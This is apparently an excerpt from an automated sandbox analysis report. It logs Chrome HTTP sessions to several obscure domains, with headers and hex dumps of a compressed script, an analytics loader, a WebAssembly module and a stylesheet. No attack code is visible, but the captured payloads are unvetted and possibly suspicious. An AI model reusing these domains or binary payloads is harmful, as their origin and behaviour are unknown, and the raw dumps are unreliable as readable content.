                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:08 UTC706INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 1421
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XY-MP-24-18
                                                                                                                                                          ETag: W/"5d848f4f-1151"
                                                                                                                                                          Date: Thu, 06 Jun 2024 08:16:48 GMT
                                                                                                                                                          Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 08:16:48 GMT
                                                                                                                                                          Age: 311060
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;xymp24:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-XY-MP-24-18
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-05
                                                                                                                                                          X-Cdn-Request-ID: a09ae143384077d2884b2570213ec0a9
                                                                                                                                                          2024-06-09 22:41:08 UTC1421INData Raw: 1f 8b 08 00 00 00 00 00 00 03 b5 18 6d 4f db 46 f8 af 30 2b ab 7c f1 61 92 4e fd 62 e7 82 da 75 1b 48 63 ac 6b b5 7e 40 08 39 f6 85 5c eb d8 c6 3e 43 3b d7 ff 7d cf bd 3b 38 30 98 b6 22 d5 dc 73 cf fb fb e1 af db 22 e5 ac 2c fc 09 ea 26 e1 ba 08 3f 7f 59 65 ef db 8a d6 67 49 7d d3 52 4a 2c 46 59 89 4f 83 ba db a4 3e 80 43 43 26 21 fd c2 69 91 f9 5d 8f f7 12 87 19 5d 27 6d ce 1b 6c 88 e3 9a f2 b6 2e 0e f8 86 35 21 4d d2 8d 6f f9 2b c6 93 ad 96 3b f1 05 0e 8a 05 f0 aa 49 eb 32 cf cf 57 9f 88 b9 0f af 29 f7 67 ea 5a dd 7e 74 77 77 2c e3 1b 7f 78 79 e2 2e 37 94 5d 6f b8 be 9d d0 9c 6e 69 c1 dd 75 ba 61 79 56 d3 c2 20 7c 66 19 58 aa d1 ee df 2a e6 ef d9 5f 94 cc 94 a6 fc 6b 45 89 f0 55 13 66 ac a6 d2 34 42 bc 9c ae b9 f7 ed db 08 5e 0b 5d 3c 74 3c 8f 66 03 86
                                                                                                                                                          Data Ascii: mOF0+|aNbuHck~@9\>C;};80"s",&?YegI}RJ,FYO>CC&!i]]'ml.5!Mo+;I2W)gZ~tww,xy.7]oniuayV |fX*_kEUf4B^]<t<f


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          313192.168.2.550073170.33.9.2274434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:08 UTC613OUTGET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=yh8613.cc&terminal=1&r=3506563745 HTTP/1.1
                                                                                                                                                          Host: ahd-ocssn.qqxgo.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://yh8613.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:09 UTC507INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:09 GMT
                                                                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: aliyungf_tc=24c32d4d021aa782eabaf45b0b4d7084088355ee344c543e8b8ca8463334461a; Path=/; HttpOnly
                                                                                                                                                          Server: Tengine/2.3.0
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          api-elapsed: 4
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:09 UTC1135INData Raw: 34 36 38 0d 0a 7b 22 61 6e 61 6c 79 74 69 63 73 43 6f 64 65 22 3a 22 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 2c 20 63 2c 20 64 2c 20 65 2c 20 6a 2c 20 73 29 20 7b 20 20 20 20 20 20 20 20 20 61 5b 64 5d 20 3d 20 61 5b 64 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 20 20 20 20 20 20 20 20 20 20 20 20 28 61 5b 64 5d 2e 61 20 3d 20 61 5b 64 5d 2e 61 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 20 20 20 20 20 20 20 20 20 7d 3b 20 20 20 20 20 20 20 20 20 6a 20 3d 20 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 63 29 2c 20 20 20 20 20 20 20 20 20 20 20 20 20 73 20 3d 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 63 29 5b 30 5d 3b 20 20 20 20 20 20 20 20 20 6a 2e 61 73 79 6e 63 20 3d 20
                                                                                                                                                          Data Ascii: 468{"analyticsCode":" (function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async =
                                                                                                                                                          2024-06-09 22:41:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          314192.168.2.550082188.114.97.34434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:09 UTC355OUTGET /mimlib.wasm HTTP/1.1
                                                                                                                                                          Host: stt-wasm.ai4funs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:09 UTC846INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:09 GMT
                                                                                                                                                          Content-Type: application/wasm
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                          ETag: W/"88346086e882b94f3127e009fea42084"
                                                                                                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                          x-robots-tag: nosnippet
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fxa1vBRLMTHSonySevk%2B%2F066OSdupVLpBtZDz9wDVexk%2BGedM0MhX%2FIt5KcByUhBod4mZAKX7NkGrcfsYKdQsX%2F%2FyakRc0i1kTgPrjEhvS%2F%2Fa0VKjk9HpKeUPqcxMubr%2FXeIRowLUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8914a0a06d2b461e-DFW
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          2024-06-09 22:41:09 UTC523INData Raw: 65 31 33 0d 0a 00 61 73 6d 01 00 00 00 01 bc 01 1b 60 04 7f 7f 7f 7f 01 7f 60 02 7f 7f 00 60 00 00 60 01 7f 00 60 03 7f 7f 7f 00 60 01 7f 01 7f 60 02 7f 7f 01 7f 60 07 7f 7e 7f 7f 7f 7f 7f 00 60 05 7f 7f 7f 7f 7f 00 60 04 7f 7f 7f 7f 00 60 03 7f 7f 7f 01 7f 60 08 7f 7f 7f 7f 7f 7f 7f 7f 00 60 06 7f 7f 7f 7f 7f 7f 00 60 03 7f 7e 7f 00 60 02 7f 7e 00 60 00 01 7f 60 03 7f 7f 7f 01 7e 60 01 7e 01 7f 60 00 01 7c 60 03 7f 7f 7f 01 7c 60 05 7f 7e 7f 7f 7f 00 60 06 7e 7f 7f 7f 7f 7f 00 60 06 7f 7e 7f 7f 7f 7f 00 60 06 7f 7f 7f 7f 7f 7f 01 7f 60 02 7f 7c 00 60 07 7f 7f 7f 7f 7f 7f 7f 00 60 05 7f 7f 7f 7f 7f 01 7f 02 bc 02 0b 03 65 6e 76 0d 72 75 6e 74 69 6d 65 2e 74 69 63 6b 73 00 12 16 77 61 73 69 5f 73 6e 61 70 73 68 6f 74 5f 70 72 65 76 69 65 77 31 08 66 64 5f
                                                                                                                                                          Data Ascii: e13asm````````~``````~`~``~`~`|`|`~`~`~``|``envruntime.tickswasi_snapshot_preview1fd_
                                                                                                                                                          2024-06-09 22:41:09 UTC1369INData Raw: 03 82 01 80 01 01 01 08 05 04 02 04 06 05 05 05 05 05 01 05 01 01 04 0c 02 02 02 08 06 0a 0a 09 08 0a 04 13 10 10 04 06 04 01 0d 0a 0e 01 03 03 02 02 02 00 00 00 05 04 03 00 03 02 03 02 03 01 01 03 02 14 15 11 11 0e 16 01 05 03 0f 03 01 05 07 01 07 07 07 07 07 00 06 09 0f 17 00 02 04 0c 06 0a 03 0b 00 04 00 01 0e 05 09 0c 04 04 05 00 0a 0d 0d 04 18 19 0b 09 05 03 06 06 02 02 02 03 02 03 0f 01 1a 04 05 01 70 01 0b 0b 05 03 01 00 02 06 12 03 7f 01 41 80 80 04 0b 7f 01 41 00 0b 7f 01 41 00 0b 07 cb 01 0d 06 6d 65 6d 6f 72 79 02 00 06 6d 61 6c 6c 6f 63 00 7e 04 66 72 65 65 00 7f 06 63 61 6c 6c 6f 63 00 80 01 07 72 65 61 6c 6c 6f 63 00 81 01 06 5f 73 74 61 72 74 00 82 01 06 72 65 73 75 6d 65 00 83 01 0c 67 6f 5f 73 63 68 65 64 75 6c 65 72 00 84 01 15 61 73 79
                                                                                                                                                          Data Ascii: pAAAmemorymalloc~freecallocrealloc_startresumego_schedulerasy
                                                                                                                                                          2024-06-09 22:41:09 UTC1369INData Raw: 00 20 02 36 02 00 20 03 41 20 6a 24 00 0b 0f 0b 21 04 23 02 28 02 00 20 04 36 02 00 23 02 23 02 28 02 00 41 04 6a 36 02 00 23 02 28 02 00 22 04 20 00 36 02 00 20 04 20 01 36 02 04 20 04 20 02 36 02 08 20 04 20 03 36 02 0c 20 04 20 05 36 02 10 20 04 20 06 36 02 14 20 04 20 07 36 02 18 20 04 20 08 36 02 1c 23 02 23 02 28 02 00 41 20 6a 36 02 00 0b c6 03 01 05 7f 23 01 41 02 46 04 40 23 02 23 02 28 02 00 41 24 6b 36 02 00 23 02 28 02 00 22 06 28 02 00 21 00 20 06 28 02 04 21 01 20 06 28 02 08 21 02 20 06 28 02 0c 21 03 20 06 28 02 10 21 04 20 06 28 02 14 21 07 20 06 28 02 18 21 08 20 06 28 02 1c 21 09 20 06 28 02 20 21 06 0b 02 7f 23 01 41 02 46 04 40 23 02 23 02 28 02 00 41 04 6b 36 02 00 23 02 28 02 00 28 02 00 21 05 0b 23 01 45 04 40 23 00 41 20 6b 22 08
                                                                                                                                                          Data Ascii: 6 A j$!#( 6##(Aj6#(" 6 6 6 6 6 6 6 6##(A j6#AF@##(A$k6#("(! (! (! (! (! (! (! (! ( !#AF@##(Ak6#((!#E@#A k"
                                                                                                                                                          2024-06-09 22:41:09 UTC349INData Raw: 05 0c 04 0b 41 8c ad 05 20 01 36 02 00 20 01 20 07 6b 22 01 41 01 10 54 20 05 20 07 6b 41 02 6a 21 02 03 40 20 02 41 8c ad 05 28 02 00 47 04 40 20 02 41 02 10 54 20 02 41 01 6a 21 02 0c 01 0b 0b 20 01 41 04 74 41 b0 b2 05 6a 22 01 41 00 20 00 fc 0b 00 20 01 0f 0b 0b 20 08 41 03 46 41 01 23 01 1b 04 40 41 cc 87 04 41 0d 10 45 41 03 23 01 41 01 46 0d 04 1a 0b 23 01 45 04 40 00 0b 0b 20 06 41 00 23 01 1b 21 06 0b 23 01 45 04 40 41 8c ad 05 28 02 00 21 03 20 02 21 01 0c 01 0b 0b 00 0b 21 04 23 02 28 02 00 20 04 36 02 00 23 02 23 02 28 02 00 41 04 6a 36 02 00 23 02 28 02 00 22 04 20 00 36 02 00 20 04 20 02 36 02 04 20 04 20 01 36 02 08 20 04 20 03 36 02 0c 20 04 20 05 36 02 10 20 04 20 06 36 02 14 20 04 20 07 36 02 18 23 02 23 02 28 02 00 41 1c 6a 36 02 00 41
                                                                                                                                                          Data Ascii: A 6 k"AT kAj!@ A(G@ AT Aj! AtAj"A AFA#@AAEA#AF#E@ A#!#E@A(! !!#( 6##(Aj6#(" 6 6 6 6 6 6 6##(Aj6A
                                                                                                                                                          2024-06-09 22:41:09 UTC1369INData Raw: 37 66 66 61 0d 0a 04 6b 36 02 00 23 02 28 02 00 28 02 00 21 03 0b 23 01 45 04 40 23 00 41 20 6b 22 05 24 00 20 05 42 00 37 02 14 20 05 42 03 37 02 0c 41 b4 ad 05 28 02 00 21 04 41 b4 ad 05 20 05 41 08 6a 22 06 36 02 00 20 05 20 04 36 02 08 0b 20 03 41 00 23 01 1b 45 04 40 20 02 10 0e 41 00 23 01 41 01 46 0d 01 1a 21 06 0b 23 01 45 04 40 20 06 20 01 20 02 fc 0a 00 00 41 b4 ad 05 20 04 36 02 00 20 00 20 02 36 02 04 20 00 20 06 36 02 00 20 05 41 20 6a 24 00 0b 0f 0b 21 03 23 02 28 02 00 20 03 36 02 00 23 02 23 02 28 02 00 41 04 6a 36 02 00 23 02 28 02 00 22 03 20 00 36 02 00 20 03 20 01 36 02 04 20 03 20 02 36 02 08 20 03 20 05 36 02 0c 20 03 20 06 36 02 10 20 03 20 04 36 02 14 23 02 23 02 28 02 00 41 18 6a 36 02 00 0b 0b 00 41 12 41 a4 88 04 10 89 01 0b 91
                                                                                                                                                          Data Ascii: 7ffak6#((!#E@#A k"$ B7 B7A(!A Aj"6 6 A#E@ A#AF!#E@ A 6 6 6 A j$!#( 6##(Aj6#(" 6 6 6 6 6 6##(Aj6AA
                                                                                                                                                          2024-06-09 22:41:09 UTC1369INData Raw: 00 0b 0b 20 01 41 00 23 01 1b 45 04 40 20 00 10 14 41 00 23 01 41 01 46 0d 01 1a 21 00 0b 23 01 45 04 40 20 00 2f 01 10 0f 0b 00 0b 21 01 23 02 28 02 00 20 01 36 02 00 23 02 23 02 28 02 00 41 04 6a 36 02 00 23 02 28 02 00 20 00 36 02 00 23 02 23 02 28 02 00 41 04 6a 36 02 00 41 00 0b a0 03 01 03 7f 23 01 41 02 46 04 40 23 02 23 02 28 02 00 41 08 6b 36 02 00 23 02 28 02 00 22 01 28 02 00 21 00 20 01 28 02 04 21 01 0b 02 7f 23 01 41 02 46 04 40 23 02 23 02 28 02 00 41 04 6b 36 02 00 23 02 28 02 00 28 02 00 21 03 0b 20 01 20 00 45 23 01 1b 21 01 02 40 23 01 45 04 40 20 01 0d 01 20 00 41 03 71 21 01 0b 02 40 02 40 23 01 45 04 40 02 40 02 40 02 40 02 40 20 01 0d 00 41 01 21 01 02 40 02 40 20 00 2d 00 00 41 1f 71 41 01 6b 0e 1a 08 02 08 00 02 04 02 08 00 02 04
                                                                                                                                                          Data Ascii: A#E@ A#AF!#E@ /!#( 6##(Aj6#( 6##(Aj6A#AF@##(Ak6#("(! (!#AF@##(Ak6#((! E#!@#E@ Aq!@@#E@@@@@ A!@@ -AqAk
                                                                                                                                                          2024-06-09 22:41:09 UTC1369INData Raw: 04 40 02 40 20 01 0e 03 00 0a 02 03 0b 20 02 41 28 6a 21 01 0b 20 06 41 03 46 41 01 23 01 1b 04 40 20 01 41 e7 85 04 41 07 20 04 20 09 10 0d 41 03 23 01 41 01 46 0d 0d 1a 0b 23 01 45 04 40 20 02 20 02 28 02 28 22 04 36 02 c4 05 20 02 28 02 2c 21 09 0c 0c 0b 0b 23 01 45 04 40 20 09 45 22 01 0d 09 20 04 2d 00 00 41 3c 47 21 01 0b 02 40 23 01 45 04 40 20 01 0d 01 20 02 41 38 6a 21 01 0b 20 06 41 04 46 41 01 23 01 1b 04 40 20 01 41 ee 85 04 41 06 20 04 20 09 10 0d 41 04 23 01 41 01 46 0d 0d 1a 0b 23 01 45 04 40 20 02 20 02 28 02 38 22 04 36 02 c8 05 20 02 28 02 3c 21 03 20 02 41 30 6a 21 01 0b 20 06 41 05 46 41 01 23 01 1b 04 40 20 01 20 04 20 03 41 f4 85 04 41 01 10 0d 41 05 23 01 41 01 46 0d 0d 1a 0b 23 01 45 04 40 20 02 20 02 28 02 30 22 04 36 02 cc 05 20
                                                                                                                                                          Data Ascii: @@ A(j! AFA#@ AA A#AF#E@ (("6 (,!#E@ E" -A<G!@#E@ A8j! AFA#@ AA A#AF#E@ (8"6 (<! A0j! AFA#@ AAA#AF#E@ (0"6
                                                                                                                                                          2024-06-09 22:41:09 UTC1369INData Raw: 01 21 05 0b 20 06 41 17 46 41 01 23 01 1b 04 40 20 03 41 fe 85 04 41 04 20 04 20 05 10 0d 41 17 23 01 41 01 46 0d 07 1a 0b 23 01 45 04 40 20 02 20 02 28 02 b0 01 22 04 36 02 a0 06 20 02 41 a8 01 6a 21 03 20 02 28 02 b4 01 21 05 0b 20 06 41 18 46 41 01 23 01 1b 04 40 20 03 20 04 20 05 41 82 86 04 41 01 10 0d 41 18 23 01 41 01 46 0d 07 1a 0b 23 01 45 04 40 20 02 20 02 28 02 a8 01 22 04 36 02 a4 06 20 02 28 02 ac 01 21 09 0b 20 06 41 19 46 41 01 23 01 1b 04 40 20 01 10 17 41 19 23 01 41 01 46 0d 07 1a 21 0b 0b 23 01 45 04 40 20 02 20 0b 36 02 a8 06 20 02 41 a0 01 6a 21 01 0b 20 06 41 1a 46 41 01 23 01 1b 04 40 20 01 20 0b 10 18 41 1a 23 01 41 01 46 0d 07 1a 0b 23 01 45 04 40 20 02 20 02 28 02 a0 01 22 0b 36 02 ac 06 20 02 28 02 a4 01 21 03 20 02 41 98 01 6a
                                                                                                                                                          Data Ascii: ! AFA#@ AA A#AF#E@ ("6 Aj! (! AFA#@ AAA#AF#E@ ("6 (! AFA#@ A#AF!#E@ 6 Aj! AFA#@ A#AF#E@ ("6 (! Aj
                                                                                                                                                          2024-06-09 22:41:09 UTC1369INData Raw: 20 02 28 02 f4 01 21 07 20 02 20 0c 41 96 83 04 6a 2d 00 00 3a 00 9e 05 20 02 41 9e 05 6a 21 08 20 02 41 e0 01 6a 21 05 0b 20 06 41 27 46 41 01 23 01 1b 04 40 20 05 20 04 20 08 20 07 20 03 41 01 10 1d 41 27 23 01 41 01 46 0d 0e 1a 0b 23 01 45 04 40 20 02 20 02 28 02 e0 01 22 04 36 02 80 07 20 09 2d 00 00 41 0f 71 22 0c 41 0f 46 0d 0b 20 02 28 02 e8 01 21 03 20 02 28 02 e4 01 21 07 20 02 20 0c 41 96 83 04 6a 2d 00 00 3a 00 9f 05 41 01 21 0c 20 02 41 9f 05 6a 21 08 20 02 41 d0 01 6a 21 05 0b 20 06 41 28 46 41 01 23 01 1b 04 40 20 05 20 04 20 08 20 07 20 03 41 01 10 1d 41 28 23 01 41 01 46 0d 0e 1a 0b 23 01 45 04 40 20 02 28 02 d8 01 21 07 20 02 28 02 d4 01 21 08 20 02 28 02 d0 01 21 04 0c 03 0b 0b 23 01 45 04 40 20 02 41 22 3a 00 a0 05 20 02 41 b0 04 6a 21
                                                                                                                                                          Data Ascii: (! Aj-: Aj! Aj! A'FA#@ AA'#AF#E@ ("6 -Aq"AF (! (! Aj-:A! Aj! Aj! A(FA#@ AA(#AF#E@ (! (! (!#E@ A": Aj!
                                                                                                                                                          2024-06-09 22:41:09 UTC1369INData Raw: 01 23 01 1b 04 40 20 03 20 04 41 a6 8d 04 20 08 20 07 41 02 10 1d 41 34 23 01 41 01 46 0d 10 1a 0b 23 01 45 04 40 20 02 20 02 28 02 c0 03 22 04 36 02 a0 07 20 02 28 02 c8 03 21 07 20 02 28 02 c4 03 21 08 0c 04 0b 0b 20 03 20 02 41 d0 03 6a 23 01 1b 21 03 20 06 41 35 46 41 01 23 01 1b 04 40 20 03 20 04 41 a8 8d 04 20 08 20 07 41 02 10 1d 41 35 23 01 41 01 46 0d 0f 1a 0b 23 01 45 04 40 20 02 20 02 28 02 d0 03 22 04 36 02 a4 07 20 02 28 02 d8 03 21 07 20 02 28 02 d4 03 21 08 0c 03 0b 0b 20 03 20 02 41 e0 03 6a 23 01 1b 21 03 20 06 41 36 46 41 01 23 01 1b 04 40 20 03 20 04 41 aa 8d 04 20 08 20 07 41 02 10 1d 41 36 23 01 41 01 46 0d 0e 1a 0b 23 01 45 04 40 20 02 20 02 28 02 e0 03 22 04 36 02 a8 07 20 02 28 02 e8 03 21 07 20 02 28 02 e4 03 21 08 0c 02 0b 0b 20
                                                                                                                                                          Data Ascii: #@ A AA4#AF#E@ ("6 (! (! Aj#! A5FA#@ A AA5#AF#E@ ("6 (! (! Aj#! A6FA#@ A AA6#AF#E@ ("6 (! (!


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          315192.168.2.55007690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:09 UTC555OUTGET /pc/240516-03/static/css/t4043.css HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:09 UTC631INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:09 GMT
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 438633
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:56:30 GMT
                                                                                                                                                          ETag: "6645ca3e-6b169"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[6],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,5],EU-GER-frankfurt-GLOBAL1-CACHE2[451],EU-GER-frankfurt-GLOBAL1-CACHE6[423,TCP_MISS,444],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 552a0344087a7ea5e779d221943b20b3
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1993405
                                                                                                                                                          X-CCDN-Expires: 598597
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:09 UTC15753INData Raw: 2e 74 75 74 6f 72 69 61 6c 2d 62 6f 64 79 5b 64 61 74 61 2d 76 2d 65 39 37 35 37 39 38 38 5d 7b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 30 31 62 31 35 20 75 72 6c 28 2f 70 63 2f 69 6d 61 67 65 2d 70 63 2f 74 75 74 6f 72 69 61 6c 2f 62 69 67 2d 62 67 2e 6a 70 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 62 6f 74 74 6f 6d 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 76 65 72 7d 2e 74 75 74 6f 72 69 61 6c 2d 62 6f 64 79 20 5b 64 61 74 61 2d 76 2d 65 39 37 35 37 39 38 38 5d 2c 2e 74 75 74 6f 72 69 61 6c 2d 62 6f 64 79 20 5b 64 61 74 61 2d 76 2d 65 39 37 35 37 39 38 38 5d 3a 61 66 74 65 72 2c 2e 74 75 74 6f 72 69 61 6c 2d 62 6f 64 79 20 5b 64 61 74 61 2d 76 2d 65 39 37 35 37 39 38 38 5d 3a 62 65 66 6f 72
                                                                                                                                                          Data Ascii: .tutorial-body[data-v-e9757988]{min-width:1000px;background:#201b15 url(/pc/image-pc/tutorial/big-bg.jpg) no-repeat bottom;background-size:cover}.tutorial-body [data-v-e9757988],.tutorial-body [data-v-e9757988]:after,.tutorial-body [data-v-e9757988]:befor
                                                                                                                                                          2024-06-09 22:41:09 UTC16384INData Raw: 5f 63 6f 6e 74 61 69 6e 65 72 20 2e 64 72 6f 70 2d 64 6f 77 6e 2d 6d 65 6e 75 20 2e 6d 65 6e 75 2d 77 72 61 70 70 65 72 20 2e 67 72 69 64 2d 77 72 61 70 70 65 72 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 33 73 7d 23 61 63 2d 2d 77 72 61 70 70 65 72 20 2e 61 63 74 69 76 69 74 79 5f 63 6f 6e 74 61 69 6e 65 72 20 2e 64 72 6f 70 2d 64 6f 77 6e 2d 6d 65 6e 75 20 2e 6d 65 6e 75 2d 77 72 61 70 70 65 72 20 2e 67 72 69 64 7b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78
                                                                                                                                                          Data Ascii: _container .drop-down-menu .menu-wrapper .grid-wrapper{width:100%;display:-ms-flexbox;display:flex;position:absolute;top:0;left:0;transition:.3s}#ac--wrapper .activity_container .drop-down-menu .menu-wrapper .grid{display:-ms-flexbox;display:flex;-ms-flex
                                                                                                                                                          2024-06-09 22:41:09 UTC16384INData Raw: 69 6e 2d 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 20 2e 37 36 36 36 37 73 20 6c 69 6e 65 61 72 20 31 7d 2e 68 62 73 64 2d 32 34 5b 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 5d 7b 74 6f 70 3a 31 30 30 25 3b 61 6e 69 6d 61 74 69 6f 6e 3a 48 6f 6e 67 62 61 6f 52 61 69 6e 2d 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 20 2e 38 73 20 6c 69 6e 65 61 72 20 31 3b 2d 6d 73 2d 61 6e 69 6d 61 74 69 6f 6e 3a 48 6f 6e 67 62 61 6f 52 61 69 6e 2d 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 20 2e 38 73 20 6c 69 6e 65 61 72 20 31 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 48 6f 6e 67 62 61 6f 52 61 69 6e 2d 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 20 2e 38 73 20 6c 69 6e 65 61 72 20 31 7d 2e 68 62 73 64 2d 32 35 5b 64 61 74 61 2d 76 2d 35 38 33
